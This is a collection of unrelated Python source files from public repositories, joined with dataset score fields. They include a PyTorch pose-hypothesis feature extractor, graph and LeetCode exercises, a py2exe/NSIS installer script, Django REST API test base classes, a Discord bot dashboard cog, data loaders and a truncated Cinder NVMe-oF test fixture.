img = torch.from_numpy(img_hsv).to(img.device).float()
model_colors_rgb = img2uint8(np.expand_dims(to_np(model_colors), 0))
# model_colors_hsv = rgb2hsv(model_colors_rgb)[0]
model_colors_hsv = cv2.cvtColor(model_colors_rgb,cv2.COLOR_RGB2HSV)[0]
model_colors_hsv = model_colors_hsv.astype(float) / 255.0
model_colors = torch.from_numpy(model_colors_hsv).to(model_colors.device).float()
# Sample the observed HSVD
with TorchTimer("Sample obvervation", agg_list=self.timing_list, timing = self.timing, verbose=False):
obs_color = img[uv[:,:,1], uv[:,:,0], :]
obs_depth = depth[uv[:,:,1], uv[:,:,0]]
with TorchTimer("Hypo Pruning", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.args.inconst_ratio_th is not None and self.mode == "test":
d_diff = proj_depth - obs_depth
n_points = model_points.shape[0]
invalid_count = (d_diff < -0.02).sum(-1).float()
invalid_ratio = invalid_count / n_points
th = self.args.inconst_ratio_th
idx = invalid_ratio < (th/100.0)
idx[-1] = True
# At least preserve some non-oracle hypos
if idx.sum() == 1:
idx[0] = True
pruning_mask = idx
transforms = transforms[idx]
trans_pts = trans_pts[idx]
obs_color = obs_color[idx]
obs_depth = obs_depth[idx]
uv = uv[idx]
invalid_proj = invalid_proj[idx]
proj_depth = proj_depth[idx]
self.SelectDataByIdx(data, idx)
uv_original = copy.deepcopy(uv)
data['uv_original'] = uv_original
# Transform normals
with TorchTimer("Transform and project 2", agg_list=self.timing_list, timing = self.timing, verbose=False):
trans_norms = torch.einsum('ijk,mk->imj', transforms[:,:3,:3], model_normals)
cam_norm_cos = (- trans_pts * trans_norms).sum(-1) / (torch_norm_fast(trans_pts, -1) * torch_norm_fast(trans_norms, -1))
valid_norm = cam_norm_cos > 0
valid_proj = valid_norm * torch.bitwise_not(invalid_proj)
data['valid_proj'] = valid_proj
# x = []
x = model_points.new_empty((len(transforms), len(model_points), self.dim_point))
idx_feat = 0
with TorchTimer("Valid proj/depth", agg_list=self.timing_list, timing = self.timing, verbose=False):
valid_depth = obs_depth > 0
'''Mask channel'''
if not self.args.no_valid_proj:
# x += [valid_proj.unsqueeze(-1).float()]
x[:, :, idx_feat] = valid_proj.float()
idx_feat += 1
if not self.args.no_valid_depth:
# x += [valid_depth.unsqueeze(-1).float()]
x[:, :, idx_feat] = valid_depth.float()
idx_feat += 1
'''XYZ channel'''
with TorchTimer("Normalize uv", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.uv or self.uvd:
uv = uv.float()
uv_mean = uv.mean(dim=1, keepdim=True)
uv_std = uv.std(dim=1, keepdim=True)
uv = (uv - uv_mean) / uv_std
if self.uv_rot:
n_hypo, n_point, n_coord = uv.shape
'''random flip'''
flip_mat = torch.rand((n_hypo, 1, n_coord)) > 0.5
flip_mat = (flip_mat.type(uv.dtype) - 0.5) * 2
uv = uv * flip_mat
'''random rotation'''
rot_mat = torch.rand((n_hypo, 1, 1)) * 2 * np.pi
rot_mat = torch.cat([
torch.cos(rot_mat), -torch.sin(rot_mat),
torch.sin(rot_mat), torch.cos(rot_mat)
], 2).reshape((-1, 1, 2, 2))
uv = uv.unsqueeze(-1)
uv = torch.matmul(rot_mat, uv)
uv = uv.squeeze()
# x += [uv]
x[:, :, idx_feat:idx_feat+2] = uv
idx_feat += 2
if self.uvd:
d_diff = proj_depth.unsqueeze(-1) - obs_depth.unsqueeze(-1)
d_diff = (d_diff - d_diff.mean(dim=1, keepdim=True)) / d_diff.std(dim=1, keepdim=True)
# x += [d_diff]
x[:, :, idx_feat:idx_feat+1] = d_diff
idx_feat += 1
'''Point data channel'''
if self.cos:
# x += [cam_norm_cos.unsqueeze(-1).float()]
x[:, :, idx_feat] = cam_norm_cos.float()
idx_feat += 1
with TorchTimer("Compute RGBD/HSVD diff", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.RGB or self.HSV:
if self.diff:
color_diff = model_colors.unsqueeze(0).expand(obs_color.shape) - obs_color
if self.HSV:
color_diff[:,:,0] = color_diff[:,:,0].abs()
color_diff[:,:,0] = np.minimum(color_diff[:,:,0], 1-color_diff[:,:,0])
# x += [color_diff]
x[:, :, idx_feat:idx_feat+3] = color_diff
idx_feat += 3
else:
# x += [model_colors.unsqueeze(0).expand(obs_color.shape), obs_color]
x[:, :, idx_feat:idx_feat+3] = model_colors.unsqueeze(0).expand(obs_color.shape)
idx_feat += 3
x[:, :, idx_feat:idx_feat+3] = obs_color
idx_feat += 3
if self.D:
if self.diff:
# x += [proj_depth.unsqueeze(-1) - obs_depth.unsqueeze(-1)]
x[:, :, idx_feat] = proj_depth - obs_depth
idx_feat += 1
else:
# x += [proj_depth.unsqueeze(-1), obs_depth.unsqueeze(-1)]
x[:, :, idx_feat] = proj_depth
idx_feat += 1
x[:, :, idx_feat] = obs_depth
idx_feat += 1
'''Edge channel'''
with TorchTimer("Edge", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.edge:
'''Observed edges'''
if "depth_for_edge" in data:
depth_for_edge = data['depth_for_edge']
# print("Using depth_for_edge", depth_for_edge.min(), depth_for_edge.max())
else:
depth_for_edge = depth
with TorchTimer("generate_distance_image", agg_list=self.timing_list, timing = self.timing, verbose=False):
edge_obs = generate_distance_image(depth_for_edge, canny_l=20, canny_h=50)[0,0]
with TorchTimer("Edge sampling", agg_list=self.timing_list, timing = self.timing, verbose=False):
uv = copy.deepcopy(uv_original) # Re-fetch the uv as it is changed before
edge_score_obs = edge_obs[uv[:,:,1], uv[:,:,0]]
edge_score_obs = torch.exp(-edge_score_obs / 24)
'''Projected edges'''
with TorchTimer("getRendEdgeScore", agg_list=self.timing_list, timing = self.timing, verbose=False):
if "edge_score_rend" in data:
edge_score_rend = data['edge_score_rend']
else:
with torch.no_grad():
edge_score_rend = getRendEdgeScore(img.to(self.args.edge_gpu), uv_original.to(self.args.edge_gpu)).to(uv_original.device)
'''Normalized edge scores'''
edge_score_rend = edge_score_rend / edge_score_rend.max(1, keepdim=True)[0]
# edge_score_obs = torch.exp(-edge_score_obs / )
if self.edgexnor:
edge_score = edge_score_rend * edge_score_obs + (1 - edge_score_rend) * (1 - edge_score_obs)
# x += [edge_score.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score
idx_feat += 1
elif self.edgecos:
# x += [edge_score_obs.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score_obs
idx_feat += 1
else:
# x += [edge_score_obs.unsqueeze(-1)]
# x += [edge_score_rend.unsqueeze(-1)]
x[:, :, idx_feat] = edge_score_obs
idx_feat += 1
x[:, :, idx_feat] = edge_score_rend
idx_feat += 1
if self.args.camera_scale is not None:
meta_data['camera_scale'] = self.args.camera_scale
'''Use the cos of the angle between observed and rendered normal vectors'''
with TorchTimer("Normal vector", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.norm_cos:
norm_downsample = self.args.norm_downsample
uv = uv_original # Re-fetch the uv as it is changed before
normals = compute_normals(to_np(depth)[::norm_downsample, ::norm_downsample].astype(np.double), meta_data = meta_data)
normals = torch.from_numpy(normals).float()
scene_normals_proj = normals[uv[:,:,1]//norm_downsample, uv[:,:,0]//norm_downsample]
model_normals_proj = trans_norms
norm_cos = (scene_normals_proj * model_normals_proj).sum(dim=-1) / (torch_norm_fast(scene_normals_proj, -1) * torch_norm_fast(model_normals_proj, -1))
norm_cos[norm_cos != norm_cos] = 0
# x += [norm_cos.unsqueeze(-1).float()]
x[:, :, idx_feat] = norm_cos.float()
idx_feat += 1
# with TorchTimer("torch.cat()", agg_list=self.timing_list, timing = self.timing, verbose=False):
# x = torch.cat(x, dim=-1)
# print(x.shape)
if self.args.hard_mask:
x[~valid_proj.bool()]=0
'''Sample the points'''
if self.drop_ratio >= 0 and self.mode == 'train':
n_hypo = x.shape[0]
n_point = x.shape[1]
n_point_kept = int((1.0-self.drop_ratio) * n_point)
if self.max_points is not None and n_point_kept > self.max_points:
n_point_kept = self.max_points
idx = []
for i in range(n_hypo):
idx.append(torch.randperm(n_point)[:n_point_kept].unsqueeze(0))
idx = torch.cat(idx, dim=0)
x = x[torch.arange(n_hypo).unsqueeze(1).expand(n_hypo, n_point_kept), idx]
uv_sampled = uv_original[torch.arange(n_hypo).unsqueeze(1).expand(n_hypo, n_point_kept), idx]
else:
uv_sampled = uv_original
if return_uv_original:
return x, uv_sampled
else:
return x
def getPointRenderData(self, data):
point_x, uv = self.getPointNetData(data, True)
crop_size = 96
pad_size = 2
n_hypo = uv.shape[0]
n_point = uv.shape[1]
span_min = pad_size
span_max = crop_size - pad_size
mask_index = [0]
# data_index = [0, 1] + list(range(4, point_x.shape[2]))
data_index = list(range(point_x.shape[2]))
n_feat = len(data_index)
point_mask = point_x[:, :, mask_index].bool()
point_data = point_x[:, :, data_index]
uv = uv.float()
uv_max = uv.max(dim=1, keepdim=True)[0]
uv_min = uv.min(dim=1, keepdim=True)[0]
uv_center = (uv_max + uv_min) / 2.0
uv_radius = (uv_max - uv_min).max(-1, True)[0] / 2.0
uv_norm = (uv - uv_center) / uv_radius # range in [-1, 1]
uv_resize = (uv_norm + 1) / 2 * (span_max - span_min) + span_min
uv_resize = uv_resize.long()
u = uv_resize[:, :, 0]
v = uv_resize[:, :, 1]
feature_map = torch.zeros(n_hypo, n_feat, crop_size, crop_size)
t = torch.arange(n_hypo).view(-1,1).repeat(1, n_point)
u = u.reshape(-1)[point_mask.view(-1)]
v = v.reshape(-1)[point_mask.view(-1)]
t = t.view(-1)[point_mask.view(-1)]
feature_map[t.view(-1), :, v.view(-1), u.view(-1)] = point_data.view(-1, n_feat)[point_mask.view(-1)]
mask_map = feature_map[:, 0:1, :, :]
data_map = feature_map[:, 1:, :, :]
return mask_map, data_map
def SelectDataByIdx(self, data, idx):
data['transforms'] = data['transforms'][idx]
data['pp_err'] = data['pp_err'][idx]
if "edge_score_rend" in data:
data['edge_score_rend'] = data['edge_score_rend'][idx]
return data
def __getitem__(self, idx):
dp = self.datapoints[idx]
to_return = {"object_id": dp[0], "scene_id": dp[1], "im_id": dp[2]}
obj_id = dp[0]
scene_id = dp[1]
im_id = dp[2]
'''If only used aggregated features, return the cached one'''
if self.return_agg and not self.return_points and self.agg_cache[idx] is not None:
to_return['agg_x'], to_return['pp_err'], to_return['transforms'] = self.agg_cache[idx]
return to_return
# data = loadData(*dp, feature_size = self.feature_size, base_path = self.dataset_root)
# '''Get the model data and send it into the processing function'''
# model_data = self.getModelData(dp[0])
# data.update(model_data)
data = self.loader.loadData(*dp)
assert len(data['pp_err']) == 101 or len(data['pp_err']) == 1101 or len(data['pp_err']) == 301
assert not (self.args.ppf_only and self.args.sift_only)
if self.args.ppf_only:
assert len(data['pp_err']) >= self.args.n_ppf_hypos + 1
idx = list(np.arange(self.args.n_ppf_hypos)) + [-1]
self.SelectDataByIdx(data, idx)
if self.args.sift_only:
assert len(data['pp_err']) >= self.args.n_ppf_hypos + self.args.n_sift_hypos + 1
idx = list(range(self.n_ppf_hypos, self.n_ppf_hypos+self.n_sift_hypos)) + [-1]
data = self.SelectDataByIdx(data, idx)
'''Sample the hypotheses'''
point_x = self.getPointNetData(data)
n_hypo = len(point_x)
to_return['object_id'] = to_return['object_id'].repeat(n_hypo)
to_return['scene_id'] = to_return['scene_id'].repeat(n_hypo)
to_return['im_id'] = to_return['im_id'].repeat(n_hypo)
to_return['pp_err'] = data['pp_err'].reshape(-1)
to_return['transforms'] = data['transforms']
if self.return_agg:
to_return['agg_x'] = self.getAggData(data)
self.agg_cache[idx] = (to_return['agg_x'], to_return['pp_err'], to_return['transforms'])
if self.return_points:
if self.return_rend:
to_return['rend_mask'], to_return['x_rend'] = self.getPointRenderData(data)
to_return['mask_x'] = to_return['rend_mask']
to_return['rend_x'] = to_return['x_rend']
else:
to_return['point_x'] = point_x
# print("to_return['pp_err']", to_return['pp_err'])
# print("to_return['pp_err']", to_return['pp_err'].shape)
# print("to_return['transforms']", to_return['transforms'].shape)
# print("to_return['point_x']", to_return['point_x'].shape)
to_return['dataset_i'] = 0
# For ICP post-processing
to_return['depth'] = data['depth']
to_return['meta_data'] = data['meta_data']
to_return['uv_original'] = data['uv_original']
to_return['model_points'] = data['model_points']
return to_return
| 2.125 | 2 |
em Python/Roteiro7/Roteiro7__testes_dijkstra.py | GuilhermeEsdras/Grafos | 0 | 6947 | from Roteiro7.Roteiro7__funcoes import GrafoComPesos
# .:: Arquivo de Testes do Algoritmo de Dijkstra ::. #
# --------------------------------------------------------------------------- #
grafo_aula = GrafoComPesos(
['E', 'A', 'B', 'C', 'D'],
{
'E-A': 1,
'E-C': 10,
'A-B': 2,
'B-C': 4,
'C-D': 3
}
)
print(grafo_aula)
print('Menor caminho por Dijkstra: ', grafo_aula.dijkstra('E', 'D'))
print("-------------------------")
grafo_aula2 = GrafoComPesos(
['A', 'B', 'C', 'D', 'E', 'F', 'G'],
{
'A-B': 1, 'A-F': 3, 'A-G': 2,
'B-F': 1,
'C-B': 2,
'C-D': 5,
'D-E': 2,
'F-D': 4,
'F-G': 2,
'G-E': 7,
}
)
print(grafo_aula2)
print('Menor caminho por Dijkstra: ', grafo_aula2.dijkstra('A', 'E'))
| 3.1875 | 3 |
QScreenCast/spyder/api.py | awinia-github/QScreenCast | 0 | 6948 | <filename>QScreenCast/spyder/api.py
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © <NAME>
# Licensed under the terms of the MIT License
# ----------------------------------------------------------------------------
"""
Python QtScreenCaster Spyder API.
"""
class ScreenResolutions:
Screen1080x1020 = '1080x1020'
| 1.25 | 1 |
setup.py | aaron19950321/ICOM | 5 | 6949 | <filename>setup.py<gh_stars>1-10
import os, os.path
import subprocess
from distutils.core import setup
from py2exe.build_exe import py2exe
PROGRAM_NAME = 'icom_app'
PROGRAM_DESC = 'simple icom app'
NSIS_SCRIPT_TEMPLATE = r"""
!define py2exeOutputDirectory '{output_dir}\'
!define exe '{program_name}.exe'
; Uses solid LZMA compression. Can be slow, use discretion.
SetCompressor /SOLID lzma
; Sets the title bar text (although NSIS seems to append "Installer")
Caption "{program_desc}"
Name '{program_name}'
OutFile ${{exe}}
Icon '{icon_location}'
; Use XPs styles where appropriate
XPStyle on
; You can opt for a silent install, but if your packaged app takes a long time
; to extract, users might get confused. The method used here is to show a dialog
; box with a progress bar as the installer unpacks the data.
;SilentInstall silent
AutoCloseWindow true
ShowInstDetails nevershow
Section
DetailPrint "Extracting application..."
SetDetailsPrint none
InitPluginsDir
SetOutPath '$PLUGINSDIR'
File /r '${{py2exeOutputDirectory}}\*'
GetTempFileName $0
;DetailPrint $0
Delete $0
StrCpy $0 '$0.bat'
FileOpen $1 $0 'w'
FileWrite $1 '@echo off$\r$\n'
StrCpy $2 $TEMP 2
FileWrite $1 '$2$\r$\n'
FileWrite $1 'cd $PLUGINSDIR$\r$\n'
FileWrite $1 '${{exe}}$\r$\n'
FileClose $1
; Hide the window just before the real app launches. Otherwise you have two
; programs with the same icon hanging around, and it's confusing.
HideWindow
nsExec::Exec $0
Delete $0
SectionEnd
"""
class NSISScript(object):
NSIS_COMPILE = "makensis"
def __init__(self, program_name, program_desc, dist_dir, icon_loc):
self.program_name = program_name
self.program_desc = program_desc
self.dist_dir = dist_dir
self.icon_loc = icon_loc
self.pathname = "setup_%s.nsi" % self.program_name
def create(self):
contents = NSIS_SCRIPT_TEMPLATE.format(
program_name = self.program_name,
program_desc = self.program_desc,
output_dir = self.dist_dir,
icon_location = os.path.join(self.dist_dir, self.icon_loc))
with open(self.pathname, "w") as outfile:
outfile.write(contents)
def compile(self):
subproc = subprocess.Popen(
# "/P5" uses realtime priority for the LZMA compression stage.
# This can get annoying though.
[self.NSIS_COMPILE, self.pathname, "/P5"], env=os.environ)
subproc.communicate()
retcode = subproc.returncode
if retcode:
raise RuntimeError("NSIS compilation return code: %d" % retcode)
class build_installer(py2exe):
# This class first builds the exe file(s), then creates an NSIS installer
# that runs your program from a temporary directory.
def run(self):
# First, let py2exe do it's work.
py2exe.run(self)
lib_dir = self.lib_dir
dist_dir = self.dist_dir
# Create the installer, using the files py2exe has created.
script = NSISScript(PROGRAM_NAME,
PROGRAM_DESC,
dist_dir,
os.path.join('.', 'icon.ico'))
print "*** creating the NSIS setup script***"
script.create()
print "*** compiling the NSIS setup script***"
script.compile()
zipfile = r"lib\shardlib"
setup(
name = 'MyApp',
description = 'My Application',
version = '1.0',
window = [
{
'script': os.path.join('.','ICOM.py'),
'icon_resources': [(1, os.path.join('.', 'icom.ico'))],
'dest_base': PROGRAM_NAME,
},
],
options = {
'py2exe': {
# Py2exe options...
"optimize": 2
}
},
zipfile = zipfile,
data_files = [],# etc...
cmdclass = {"py2exe": build_installer},
) | 1.960938 | 2 |
src/lingcomp/farm/features.py | CharlottePouw/interpreting-complexity | 2 | 6950 | <gh_stars>1-10
import torch
from farm.data_handler.samples import Sample
from farm.modeling.prediction_head import RegressionHead
class FeaturesEmbeddingSample(Sample):
def __init__(self, id, clear_text, tokenized=None, features=None, feat_embeds=None):
super().__init__(id, clear_text, tokenized, features)
self.feats_embed = feat_embeds
class FeaturesRegressionHead(RegressionHead):
"""A regression head mixing [CLS] representation
and explicit features for prediction"""
def forward(self, x, feats, **kwargs):
x = torch.cat((x, feats), 1)
logits = self.feed_forward(x)
return logits
| 2.4375 | 2 |
manager/tests/api_view_test_classes.py | UN-ICC/icc-digital-id-manager | 3 | 6951 | import pytest
from rest_framework import status
from rest_framework.test import APIClient
class TestBase:
__test__ = False
path = None
get_data = {}
put_data = {}
post_data = {}
delete_data = {}
requires_auth = True
implements_retrieve = False
implements_create = False
implements_update = False
implements_destroy = False
client = APIClient()
@pytest.fixture
def setup(self, setup_method=None):
return setup_method
@pytest.fixture
def authenticate(self, api_client_admin):
self.client = api_client_admin
class TestGet(TestBase):
@pytest.fixture
def get_response(self):
return self.client.get(f"/{self.path}", self.get_data, format="json",)
def test_get_without_authentication(self, setup, get_response):
if not self.requires_auth:
if not self.implements_retrieve:
returns_status_code_http_405_not_allowed(get_response)
else:
returns_status_code_http_200_ok(get_response)
response_has_etag(get_response)
else:
returns_status_code_http_401_unauthorized(get_response)
def test_get_with_authentication(self, setup, authenticate, get_response):
if not self.implements_retrieve:
returns_status_code_http_405_not_allowed(get_response)
else:
returns_status_code_http_200_ok(get_response)
response_has_etag(get_response)
class TestPost(TestBase):
@pytest.fixture
def post_response(self):
return self.client.post(
path=f"/{self.path}", data=self.post_data, format="json",
)
def test_post_without_authentication(self, setup, post_response):
returns_status_code_http_401_unauthorized(post_response)
def test_post_with_authentication(self, setup, authenticate, post_response):
if self.implements_create:
returns_status_code_http_201_created(post_response)
else:
returns_status_code_http_405_not_allowed(post_response)
class TestPut(TestBase):
@pytest.fixture
def put_response(self):
return self.client.put(f"/{self.path}", self.put_data, format="json",)
def test_put_without_authentication(self, setup, put_response):
if not self.requires_auth:
if self.implements_update:
returns_status_code_http_200_ok(put_response)
else:
returns_status_code_http_405_not_allowed(put_response)
else:
returns_status_code_http_401_unauthorized(put_response)
def test_put_with_authentication(self, setup, authenticate, put_response):
if not self.implements_update:
returns_status_code_http_405_not_allowed(put_response)
elif self.requires_auth:
returns_status_code_http_200_ok(put_response)
else:
returns_status_code_http_401_unauthorized(put_response)
class TestDelete(TestBase):
@pytest.fixture
def delete_response(self):
return self.client.delete(f"/{self.path}", self.delete_data, format="json")
def test_delete_without_authentication(self, setup, delete_response):
if not self.requires_auth:
if self.implements_destroy:
returns_status_code_http_204_no_content(delete_response)
else:
returns_status_code_http_405_not_allowed(delete_response)
else:
returns_status_code_http_401_unauthorized(delete_response)
def test_delete_with_authentication(self, setup, authenticate, delete_response):
if not self.implements_destroy:
returns_status_code_http_405_not_allowed(delete_response)
elif self.requires_auth:
returns_status_code_http_204_no_content(delete_response)
else:
returns_status_code_http_401_unauthorized(delete_response)
class TestView(TestGet, TestPost, TestPut, TestDelete):
__test__ = False
requires_auth = True
class TestListCreateAPIView(TestView):
__test__ = False
implements_retrieve = True
implements_create = True
requires_auth = True
class TestRetrieveAPIView(TestView):
__test__ = False
implements_retrieve = True
requires_auth = True
class TestUnauthenticatedRetrieveAPIView(TestView):
__test__ = False
implements_retrieve = True
requires_auth = False
def returns_status_code_http_200_ok(response):
assert response.status_code == status.HTTP_200_OK
def returns_status_code_http_401_unauthorized(response):
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def returns_status_code_http_201_created(response):
assert response.status_code == status.HTTP_201_CREATED
def returns_status_code_http_204_no_content(response):
assert response.status_code == status.HTTP_204_NO_CONTENT
def returns_status_code_http_405_not_allowed(response):
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
def response_has_etag(response):
assert response.get("ETag")
| 2.25 | 2 |
dashboard/dashboard.py | TrustyJAID/Toxic-Cogs | 0 | 6952 | <reponame>TrustyJAID/Toxic-Cogs
from collections import defaultdict
import discord
from redbot.core import Config, checks, commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import box, humanize_list, inline
from abc import ABC
# ABC Mixins
from dashboard.abc.abc import MixinMeta
from dashboard.abc.mixin import DBMixin, dashboard
# Command Mixins
from dashboard.abc.roles import DashboardRolesMixin
from dashboard.abc.webserver import DashboardWebserverMixin
from dashboard.abc.settings import DashboardSettingsMixin
# RPC Mixins
from dashboard.baserpc import HUMANIZED_PERMISSIONS, DashboardRPC
from dashboard.menus import ClientList, ClientMenu
THEME_COLORS = ["red", "primary", "blue", "green", "greener", "yellow"]
class CompositeMetaClass(type(commands.Cog), type(ABC)):
"""This allows the metaclass used for proper type detection to coexist with discord.py's
metaclass."""
# Thanks to Flare for showing how to use group commands across multiple files. If this breaks, its his fault
class Dashboard(
DashboardRolesMixin,
DashboardWebserverMixin,
DashboardSettingsMixin,
DBMixin,
commands.Cog,
metaclass=CompositeMetaClass,
):
__version__ = "0.1.6a"
def __init__(self, bot: Red, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bot = bot
self.config = Config.get_conf(self, identifier=473541068378341376)
self.config.register_global(
secret="[Not set]",
redirect="http://127.0.0.1:42356/callback",
clientid=0,
blacklisted=[],
disallowedperms=[],
support="",
defaultcolor="red",
meta={"title": "", "icon": "", "description": "", "color": ""},
)
self.config.register_guild(roles=[])
self.configcache = defaultdict(self.cache_defaults)
self.rpc = DashboardRPC(self)
def cog_unload(self):
self.configcache.clear()
self.rpc.unload()
def cache_defaults(self):
return {"roles": []}
async def initialize(self):
config = await self.config.all_guilds()
for k, v in config.items():
self.configcache[k] = v
| 2.078125 | 2 |
algorithms/162.Find-Peak-Element/Python/solution_2.py | hopeness/leetcode | 0 | 6953 | <gh_stars>0
"""
https://leetcode.com/problems/find-peak-element/submissions/
"""
from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
l, r = 0, len(nums)-1
while l < r:
lmid = (l + r) // 2
rmid = lmid + 1
if nums[lmid] < nums[rmid]:
l = lmid + 1
else:
r = rmid - 1
return l
| 3.09375 | 3 |
data_loader.py | vinbigdata-medical/MIDL2021-Xray-Classification | 4 | 6954 | from torchvision.datasets import ImageFolder
from torchvision import transforms
import random
import os
import torch
from torch.utils.data.dataloader import DataLoader
from utils import constants, get_default_device
from image_folder_with_path import ImageFolderWithPaths
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list, tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
class DeviceDataLoader():
""" wrap a Dataloader to move data to a device """
def __init__(self, dl, device):
self.dl = dl
self.device = device
def __iter__(self):
""" yield a batch of data after moving it to device """
for b in self.dl:
yield to_device(b, self.device)
def __len__(self):
""" return number of batch size """
return len(self.dl)
default_device = get_default_device.default_device
train_transforms = transforms.Compose([
transforms.RandomHorizontalFlip(p=0.5),
transforms.RandomRotation(degrees=random.uniform(5, 10)),
transforms.Resize((512, 512)),
transforms.ToTensor(),
])
test_transforms = transforms.Compose([
transforms.Resize((512, 512)),
transforms.ToTensor(),
])
classes = os.listdir(constants.DATA_PATH + constants.TRAIN_PATH)
training_dataset = ImageFolder(constants.DATA_PATH + constants.TRAIN_PATH, transform=train_transforms)
valid_dataset = ImageFolder(constants.DATA_PATH + constants.VAL_PATH, transform=test_transforms)
# testing_dataset = ImageFolder(constants.DATA_PATH + constants.TEST_PATH, transform=test_transforms)
# training_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.TRAIN_PATH, transform=train_transforms)
# valid_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.VAL_PATH, transform=test_transforms)
testing_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.TEST_PATH, transform=test_transforms)
torch.manual_seed(constants.RANDOM_SEED)
train_dl = DataLoader(training_dataset, constants.BATCH_SIZE, shuffle=True, num_workers=8, pin_memory=True)
val_dl = DataLoader(valid_dataset, constants.BATCH_SIZE, num_workers=8, pin_memory=True)
test_dl = DataLoader(testing_dataset, constants.BATCH_SIZE, num_workers=8, pin_memory=True)
"""
Now we can wrap our training and validation data loaders using DeviceDataLoader for automatically transferring batches
of data to GPU (if available), and use to_device to move our model to GPU (if available)
"""
train_dl = DeviceDataLoader(train_dl, default_device)
val_dl = DeviceDataLoader(val_dl, default_device)
test_dl = DeviceDataLoader(test_dl, default_device) | 2.734375 | 3 |
calliope/test/test_analysis.py | sjpfenninger/calliope | 1 | 6955 | # import matplotlib
# matplotlib.use('Qt5Agg') # Prevents `Invalid DISPLAY variable` errors
import pytest
import tempfile
from calliope import Model
from calliope.utils import AttrDict
from calliope import analysis
from . import common
from .common import assert_almost_equal, solver, solver_io
import matplotlib.pyplot as plt
plt.switch_backend('agg') # Prevents `Invalid DISPLAY variable` errors
class TestModel:
@pytest.fixture(scope='module')
def model(self):
locations = """
locations:
1:
techs: ['ccgt', 'demand_power']
override:
ccgt:
constraints:
e_cap.max: 100
demand_power:
constraints:
r: -50
metadata:
map_boundary: [-10, 35, 5, 45]
location_coordinates:
1: [40, -2]
links:
"""
config_run = """
mode: plan
model: ['{techs}', '{locations}']
subset_t: ['2005-01-01', '2005-01-02']
"""
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(locations.encode('utf-8'))
f.read()
override_dict = AttrDict({
'solver': solver,
'solver_io': solver_io,
})
model = common.simple_model(config_run=config_run,
config_locations=f.name,
override=override_dict)
model.run()
return model
@pytest.fixture(scope='module')
def builtin_model(self):
model = Model()
model.run()
return model
def test_plot_carrier_production(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_carrier_production(model.solution)
def test_plot_timeseries(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_timeseries(model.solution,
model.solution['e'].loc[dict(c='power')].sum(dim='x'),
carrier='power', demand='demand_power')
def test_plot_installed_capacities(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_installed_capacities(model.solution)
def test_plot_transmission(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_transmission(model.solution, map_resolution='c')
def test_get_delivered_cost(self, model):
# TODO this should be tested with a more complex model
assert_almost_equal(analysis.get_delivered_cost(model.solution), 0.1)
def test_get_levelized_cost(self, model):
lcoe = analysis.get_levelized_cost(model.solution)
assert_almost_equal(lcoe.at['ccgt'], 0.1)
def test_get_group_share(self, model):
# TODO this should be tested with a more complex model
share = analysis.get_group_share(model.solution, techs=['ccgt'])
assert share == 1.0
def test_get_unmet_demand_hours(self, builtin_model):
# TODO this should be tested with a more complex model
unmet = analysis.get_unmet_demand_hours(builtin_model.solution)
assert unmet == 1
def test_recompute_levelized_costs(self, model):
# Cost in solution
sol = model.solution
assert_almost_equal(sol['summary'].to_pandas().loc['ccgt', 'levelized_cost_monetary'], 0.1)
# Recomputed cost must be the same
dm = analysis.SolutionModel(model.solution)
recomputed = dm.recompute_levelized_costs('ccgt')
assert_almost_equal(recomputed['total'], 0.1)
def test_recompute_levelized_costs_after_changes(self, model):
# Make changes
dm = analysis.SolutionModel(model.solution)
dm.config_model.techs.ccgt.costs.monetary.e_cap = 50
dm.config_model.techs.ccgt.costs.monetary.om_fuel = 1.0
# Recomputed cost
recomputed = dm.recompute_levelized_costs('ccgt')
assert_almost_equal(recomputed['total'], 1.0, tolerance=0.001)
| 2.03125 | 2 |
mol/data/reader.py | TzuTingWei/mol | 0 | 6956 | <reponame>TzuTingWei/mol
import os
from mol.util import read_xyz
dirname = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(dirname, 'look_and_say.dat')
with open(filename, 'r') as handle:
look_and_say = handle.read()
def get_molecule(filename):
return read_xyz(os.path.join(dirname, filename + ".xyz"))
| 2.890625 | 3 |
cinder/tests/unit/targets/test_spdknvmf.py | lightsey/cinder | 3 | 6957 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
from unittest import mock
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.targets import spdknvmf as spdknvmf_driver
BDEVS = [{
"num_blocks": 4096000,
"name": "Nvme0n1",
"driver_specific": {
"nvme": {
"trid": {
"trtype": "PCIe",
"traddr": "0000:00:04.0"
},
"ns_data": {
"id": 1
},
"pci_address": "0000:00:04.0",
"vs": {
"nvme_version": "1.1"
},
"ctrlr_data": {
"firmware_revision": "1.0",
"serial_number": "deadbeef",
"oacs": {
"ns_manage": 0,
"security": 0,
"firmware": 0,
"format": 0
},
"vendor_id": "0x8086",
"model_number": "QEMU NVMe Ctrl"
},
"csts": {
"rdy": 1,
"cfs": 0
}
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": True,
"unmap": False,
